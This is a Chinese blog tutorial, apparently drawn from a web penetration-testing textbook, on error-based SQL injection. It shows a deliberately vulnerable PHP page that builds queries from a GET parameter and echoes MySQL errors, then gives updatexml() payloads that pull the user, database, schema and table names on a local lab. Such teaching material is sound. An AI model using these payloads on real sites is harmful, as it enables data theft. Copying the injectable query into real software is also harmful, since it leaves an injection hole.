SQL注入之报错注入攻击

╰+哭是因爲堅強的太久メ 2022-12-08 04:57 144阅读 0赞

**目录**

1 环境介绍

2 实验过程

--------------------

本文采用的是《Web安全攻防渗透测试实战指南》提供的代码及数据库。

# 1 环境介绍 #

在报销注入页面中，程序获取GET参数username后，将username拼接到SQL语句中，然后到数据库查询。如果执行成功，就输出ok;如果出错，则通过echo mysqli\_ error($con)，将错误信息输出到页面(mysqli\_error返回上一个MySQL函数的错误)，代码如下所示。

error.php

<?php
    $con=mysqli_connect("localhost","root","qwer","security");
    // 检测连接
    if (mysqli_connect_errno())
    {
    	echo "连接失败: " . mysqli_connect_error();
    }
    
    $username = $_GET['username'];
    
    if($result = mysqli_query($con,"select * from users where `username`='".$username."'")){
    	echo "ok";
    }else{
    	echo mysqli_error($con);
    }
    
    ?>

输入username=1'时，SQL语句为select\*from users where 'username'='1"。执行时，会因为多了一个单引号而报错。利用这种错误回  
显，我们可以通过floor ()、updatexml ()等函数将要查询的内容输出到页面上。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70][] 测试数据库

# 2 实验过程 #

首先访问[http://127.0.0.1/four/4.1.8/error.php?username=1][http_127.0.0.1_four_4.1.8_error.php_username_1]'，因为参数username的值是1'，在数据库中执行SQL时，会因为多了一个单引号而报错，输出到页面的结果如图所示。

![20200917215836248.png][]

通过页面返回结果可以看出，程序直接将错误信息输出到了页面上，所以此处可以利用报错注入获取数据。报错注入有多种格式，此处利用函数updatexml()演示SQL语句获取user()的值，SQL语句如下所示。

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

其中0x7e是ASCI编码，解码结果为~，如图所示。  
![20200917220312944.png][]

--------------------

然后尝试获取当前数据库的库名

' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

![2020091722075152.png][]

--------------------

接着可以利用select语句继续获取数据库中的库名、表名和字段名，查询语句与Union注入的相同。因为报错注入只显示条结果，所以需要使用limit语句。构造的语句如下所示。

' and updatexml (1, concat(0x7e,(select schema_name from information_schema.schemata limit 0, 1),0x7e), 1)--+

![20200917221202343.png][]  
结果如图所示，可以获取数据库的库名。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 1][]

--------------------

如图所示，构造查询表名的语句，如下所示，可以获取数据库security的表名。

http://127.0.0.1/four/4.1.8/error.php?username=1%27%20and%20updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),0x7e),1)--+

![20200917222405852.png][]

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70]: /images/20221123/012360797ef843d78390d599c6100796.png
[http_127.0.0.1_four_4.1.8_error.php_username_1]: http://127.0.0.1/four/4.1.8/error.php?username=1%27
[20200917215836248.png]: /images/20221123/5344ff94df3e46fe8dd0bddf230f01fa.png
[20200917220312944.png]: /images/20221123/58fd61f447744dd4834775f3783cf57f.png
[2020091722075152.png]: /images/20221123/8928312317634c5d9348a9e680598e64.png
[20200917221202343.png]: /images/20221123/dfd8f80ef5134528aee0dc569127e3d4.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 1]: /images/20221123/f4fc3ba7bdac4faea07ff66bd8bab650.png
[20200917222405852.png]: /images/20221123/7ff4eb17cf534fcbb52ab21add2f606c.png